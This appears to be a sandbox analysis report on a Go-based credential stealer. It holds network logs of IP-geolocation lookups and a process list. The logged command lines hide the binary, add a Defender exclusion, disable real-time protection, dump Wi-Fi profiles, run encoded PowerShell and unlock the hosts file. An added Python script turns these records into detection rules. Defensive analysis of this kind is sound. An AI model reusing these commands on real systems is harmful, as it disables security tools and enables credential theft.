Dec 18, 2024 21:25:05.427726030 CET | 192.168.2.9 | 1.1.1.1 | 0x3f72 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 21:25:03.008239985 CET | 1.1.1.1 | 192.168.2.9 | 0x29e | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:25:03.008239985 CET | 1.1.1.1 | 192.168.2.9 | 0x29e | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:25:03.008239985 CET | 1.1.1.1 | 192.168.2.9 | 0x29e | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:25:05.565123081 CET | 1.1.1.1 | 192.168.2.9 | 0x3f72 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                                                                    • api.ipify.org
                                                                                    • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49708 | 208.95.112.1 | 80 | 7648 | C:\Users\user\Desktop\WdlA0C4PkO.exe
Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 21:25:05.686403990 CET | 111 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Dec 18, 2024 21:25:06.791457891 CET | 175 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 20:25:06 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false
Dec 18, 2024 21:25:18.303844929 CET | 95 | OUT | GET /json HTTP/1.1
Host: ip-api.com
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Dec 18, 2024 21:25:18.623378992 CET | 483 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 20:25:18 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 306
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
                                                                                    Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}
                                                                                    Dec 18, 2024 21:25:48.664314985 CET | 6 bytes | OUT | Data Raw: 00
                                                                                    Data Ascii:


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    0 | 192.168.2.9 | 49707 | 104.26.12.205 | 443 | 7648 | C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-12-18 20:25:04 UTC | 94 | OUT | GET / HTTP/1.1
                                                                                    Host: api.ipify.org
                                                                                    User-Agent: Go-http-client/1.1
                                                                                    Accept-Encoding: gzip
                                                                                    2024-12-18 20:25:04 UTC | 424 | IN | HTTP/1.1 200 OK
                                                                                    Date: Wed, 18 Dec 2024 20:25:04 GMT
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 12
                                                                                    Connection: close
                                                                                    Vary: Origin
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8f41e14b3dee729f-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2058&min_rtt=2057&rtt_var=772&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=709&delivery_rate=1419543&cwnd=169&unsent_bytes=0&cid=20025316852b17be&ts=473&x=0"
                                                                                    2024-12-18 20:25:04 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                    Data Ascii: 8.46.123.189


                                                                                    Target ID:0
                                                                                    Start time:15:25:01
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\WdlA0C4PkO.exe"
                                                                                    Imagebase:0x150000
                                                                                    File size:3'469'824 bytes
                                                                                    MD5 hash:2B344D8644F0D502C4C8370EF8674A51
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:1
                                                                                    Start time:15:25:01
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff70f010000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:3
                                                                                    Start time:15:25:02
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:attrib +h +s C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    Imagebase:0x7ff77c430000
                                                                                    File size:23'040 bytes
                                                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:15:25:02
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                    Imagebase:0x7ff77c430000
                                                                                    File size:23'040 bytes
                                                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:15:25:04
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:wmic csproduct get UUID
                                                                                    Imagebase:0x7ff7e3f60000
                                                                                    File size:576'000 bytes
                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:6
                                                                                    Start time:15:25:06
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                    Imagebase:0x7ff7e3f60000
                                                                                    File size:576'000 bytes
                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:7
                                                                                    Start time:15:25:07
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    Imagebase:0x7ff760310000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:8
                                                                                    Start time:15:25:07
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:wmic os get Caption
                                                                                    Imagebase:0x7ff7e3f60000
                                                                                    File size:576'000 bytes
                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:9
                                                                                    Start time:15:25:08
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:wmic cpu get Name
                                                                                    Imagebase:0x7ff7e3f60000
                                                                                    File size:576'000 bytes
                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:10
                                                                                    Start time:15:25:11
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                    Imagebase:0x7ff7e3f60000
                                                                                    File size:576'000 bytes
                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:12
                                                                                    Start time:15:25:12
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                    Imagebase:0x7ff760310000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:13
                                                                                    Start time:15:25:12
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
                                                                                    Imagebase:0x280000
                                                                                    File size:3'469'824 bytes
                                                                                    MD5 hash:2B344D8644F0D502C4C8370EF8674A51
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GoStealer, Description: Yara detected Go Stealer, Source: 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 55%, ReversingLabs
                                                                                    Has exited:true

                                                                                    Target ID:14
                                                                                    Start time:15:25:13
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff70f010000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:15
                                                                                    Start time:15:25:15
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:wmic csproduct get UUID
                                                                                    Imagebase:0x7ff7e3f60000
                                                                                    File size:576'000 bytes
                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:17
                                                                                    Start time:15:25:18
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:netsh wlan show profiles
                                                                                    Imagebase:0x7ff64fa90000
                                                                                    File size:96'768 bytes
                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:18
                                                                                    Start time:15:25:18
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                                                                    Imagebase:0x7ff760310000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:19
                                                                                    Start time:15:25:20
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline"
                                                                                    Imagebase:0x7ff6b43e0000
                                                                                    File size:2'759'232 bytes
                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:20
                                                                                    Start time:15:25:21
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41CB.tmp" "c:\Users\user\AppData\Local\Temp\a12sgnvo\CSC12900879E4FA4A8799F1D0272636A686.TMP"
                                                                                    Imagebase:0x7ff6205f0000
                                                                                    File size:52'744 bytes
                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:22
                                                                                    Start time:15:25:21
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
                                                                                    Imagebase:0x280000
                                                                                    File size:3'469'824 bytes
                                                                                    MD5 hash:2B344D8644F0D502C4C8370EF8674A51
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GoStealer, Description: Yara detected Go Stealer, Source: 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                    Has exited:true

                                                                                    Target ID:23
                                                                                    Start time:15:25:21
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff70f010000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:25
                                                                                    Start time:15:25:25
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                    Imagebase:0x7ff77c430000
                                                                                    File size:23'040 bytes
                                                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:26
                                                                                    Start time:15:25:25
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                    Imagebase:0x7ff77c430000
                                                                                    File size:23'040 bytes
                                                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true
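
The process entries above record three behaviours worth turning into detection logic: csc.exe compiling a response file out of %TEMP% (the PowerShell Add-Type pattern), a binary carrying a System32 name (SecurityHealthSystray.exe) running from %APPDATA%, and attrib clearing and then restoring the read-only bit on the hosts file around a write. The script below is an added example, not Joe Sandbox code and not the sample's code: it runs a few rules over process-creation records constructed from the Path, Commandline and Start time values shown in this report. The rule names, the watch-list of system binary names and the user-writable path markers are this example's own assumptions and only loosely mirror the Sigma titles the report quotes.

```python
"""
Triage of sandbox process-creation records for the behaviours listed above.
Added example, not Joe Sandbox code and not the sample's code. The records in
SAMPLE_RECORDS are CONSTRUCTED from the Path / Commandline / Start time values
in the report; rule names and watch-lists are this script's own assumptions.
"""
import re
from dataclasses import dataclass

# Assumption: a minimal watch-list of binary names that legitimately live under
# System32. One of these names running from anywhere else is the "system process
# name in an unsuspected location" pattern. Extend for real use.
SYSTEM_BINARY_NAMES = {"securityhealthsystray.exe", "svchost.exe", "lsass.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\users\\public\\", "\\temp\\")


@dataclass
class ProcRecord:
    start: str      # "HH:MM:SS" as printed in the report
    image: str      # full path of the executable
    cmdline: str


def _seconds(hhmmss):
    h, m, s = (int(x) for x in hhmmss.split(":"))
    return h * 3600 + m * 60 + s


def _in_user_writable(path):
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE_MARKERS)


def rule_csc_response_file(rec):
    """csc.exe reading a .cmdline response file (Add-Type style compile) from a user-writable path."""
    if not rec.image.lower().endswith("\\csc.exe"):
        return None
    m = re.search(r'@"?([^"\s]+\.cmdline)', rec.cmdline, re.IGNORECASE)
    if m and _in_user_writable(m.group(1)):
        return f"csc.exe compiling from {m.group(1)}"
    return None


def rule_system_name_unexpected_path(rec):
    """A System32 binary name executed from outside the system directories."""
    img = rec.image.lower()
    name = img.rsplit("\\", 1)[-1]
    if name in SYSTEM_BINARY_NAMES and not img.startswith(SYSTEM_DIRS):
        return f"{name} running from {rec.image}"
    return None


def rule_attrib_hosts(rec):
    """attrib toggling the read-only bit on the hosts file."""
    if not rec.image.lower().endswith("\\attrib.exe"):
        return None
    if re.search(r"\\drivers\\etc\\hosts\b", rec.cmdline, re.IGNORECASE):
        flag = re.search(r"(?<!\S)([+-]r)(?!\S)", rec.cmdline, re.IGNORECASE)
        return f"attrib {flag.group(1) if flag else '?'} on hosts file"
    return None


PER_RECORD_RULES = (rule_csc_response_file, rule_system_name_unexpected_path, rule_attrib_hosts)


def rule_hosts_bracketed_write(records, window_s=60):
    """Sequence rule: 'attrib -r hosts' followed by 'attrib +r hosts' within a short
    window. Clearing and restoring the read-only bit is the shape of a hosts-file
    modification; the write itself is done by another process in between."""
    toggles = [(r, rule_attrib_hosts(r)) for r in records]
    toggles = [(r, msg) for r, msg in toggles if msg]
    for i, (r1, m1) in enumerate(toggles):
        if "-r" not in m1:
            continue
        for r2, m2 in toggles[i + 1:]:
            if "+r" in m2 and 0 <= _seconds(r2.start) - _seconds(r1.start) <= window_s:
                return f"hosts read-only bit cleared at {r1.start} and restored at {r2.start}"
    return None


def triage(records):
    """Return [(rule_name, message)] for every rule that fires, per-record rules first."""
    findings = []
    for rec in records:
        for rule in PER_RECORD_RULES:
            msg = rule(rec)
            if msg:
                findings.append((rule.__name__, msg))
    seq = rule_hosts_bracketed_write(records)
    if seq:
        findings.append(("rule_hosts_bracketed_write", seq))
    return findings


# Constructed from the process entries in the report (Path / Commandline / Start time).
SAMPLE_RECORDS = [
    ProcRecord("15:25:20", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
               r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
               r'@"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline"'),
    ProcRecord("15:25:21", r"C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe",
               r'"C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"'),
    ProcRecord("15:25:21", r"C:\Windows\System32\conhost.exe",
               r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcRecord("15:25:25", r"C:\Windows\System32\attrib.exe",
               r"attrib -r C:\Windows\System32\drivers\etc\hosts"),
    ProcRecord("15:25:25", r"C:\Windows\System32\attrib.exe",
               r"attrib +r C:\Windows\System32\drivers\etc\hosts"),
]

if __name__ == "__main__":
    for name, msg in triage(SAMPLE_RECORDS):
        print(f"{name}: {msg}")
```

The per-record rules are cheap and can run on each Sysmon Event ID 1 as it arrives; the bracketed-write rule needs a short history, which is why it takes the whole record list. Note that cvtres.exe and conhost.exe produce no finding on their own: both are normal children of a csc.exe compile and a console process, and the signal is in the parent chain and the response-file location, not in those binaries.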

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1610187383.00007FF8878AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8878AD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff8878ad000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xrf
                                                                                      • API String ID: 0-3219120036
                                                                                      • Opcode ID: bac888e692075486a68d581071aa666bf7500a38257ffcbc4f8d9ed0148dc684
                                                                                      • Instruction ID: c9c8e159e50eb7fc160c83143b508a7a3325e3a918fbce0e0c26da9a06580b0f
                                                                                      • Opcode Fuzzy Hash: bac888e692075486a68d581071aa666bf7500a38257ffcbc4f8d9ed0148dc684
                                                                                      • Instruction Fuzzy Hash: 6941E03040DBC44FE7569B2C98469567FF0FF56360F1906DFD488CB1A3D629A84AC7A2
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611995859.00007FF887A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff887a90000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1466a4581db15a584ffb6180bc3e2b1bb4aa9725413df4fc15fa6abf064afab3
                                                                                      • Instruction ID: 2e349164b0602a6b937eb4e6e2fffb17288c7c09c0228a648404790349b967a9
                                                                                      • Opcode Fuzzy Hash: 1466a4581db15a584ffb6180bc3e2b1bb4aa9725413df4fc15fa6abf064afab3
                                                                                      • Instruction Fuzzy Hash: 9FE11221E8DA8A4FE7A59B6848566BD7BF4FF16390F1800BED45DCB0D3E918AC15C342
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611066948.00007FF8879C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff8879c0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d69389c53610882c9283983367a640ce24a73b4a2ec8e63cf8791562713c813
                                                                                      • Instruction ID: b4a686445a175e1b4ba3a26055717aa340eb67c38a2e35d0ee69177963bb102a
                                                                                      • Opcode Fuzzy Hash: 6d69389c53610882c9283983367a640ce24a73b4a2ec8e63cf8791562713c813
                                                                                      • Instruction Fuzzy Hash: B9B12730A1CB898FDB49DF5CC8896B9BBE1FFA5351F14017ED08AC3196DA25E846CB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611066948.00007FF8879C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff8879c0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b9df75ed0def77c3d184089e00fd572e48129a1156e16ac70096c60f21ad3ff1
                                                                                      • Instruction ID: 6a6cab10ecec35c4553baf8032e822f01787e438fd6f310098d657ed50775d29
                                                                                      • Opcode Fuzzy Hash: b9df75ed0def77c3d184089e00fd572e48129a1156e16ac70096c60f21ad3ff1
                                                                                      • Instruction Fuzzy Hash: C631B53191CB4C8FDB18DB5CE84A6A97BE0FBA9321F00422FE449D3251DA74A855CBC2
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611066948.00007FF8879C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff8879c0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                      • Instruction ID: 80c339db5053e7109d13471cab3f0864c0d04894e0694a21a396f2bc2b17e419
                                                                                      • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                      • Instruction Fuzzy Hash: 3201A77011CB0D8FDB44EF0CE455AA5B3E0FB85360F10056DE58AC3691DA36E882CB42
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611066948.00007FF8879C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff8879c0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 08941dd3f55dc7bcc6f6724ca227613f5b6fa4182a7c29c6c77316343bbf6fd0
                                                                                      • Instruction ID: e7e4a14345747c42e2b2562599ed01f3cba5c0604b295ae7b359848abd15b2c6
                                                                                      • Opcode Fuzzy Hash: 08941dd3f55dc7bcc6f6724ca227613f5b6fa4182a7c29c6c77316343bbf6fd0
                                                                                      • Instruction Fuzzy Hash: A5F096718486C98FDB06DF789C195D97FB0FF56351B08029AD458C70A2DB649458C782
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611995859.00007FF887A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff887a90000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: acf6ee97e57a173ed47a51b3249e586087252932210a9c63176644753dc5cf00
                                                                                      • Instruction ID: c99be882bbff0b5d5f4ad86877655452de9af65f25cca90e573e01700984cf08
                                                                                      • Opcode Fuzzy Hash: acf6ee97e57a173ed47a51b3249e586087252932210a9c63176644753dc5cf00
                                                                                      • Instruction Fuzzy Hash: 21F0BE32A4C6488FD699EB4CE8025EC73E0FF8432071100BAE16DCB1A3CA29EC50C741
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611995859.00007FF887A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A90000, based on PE: false
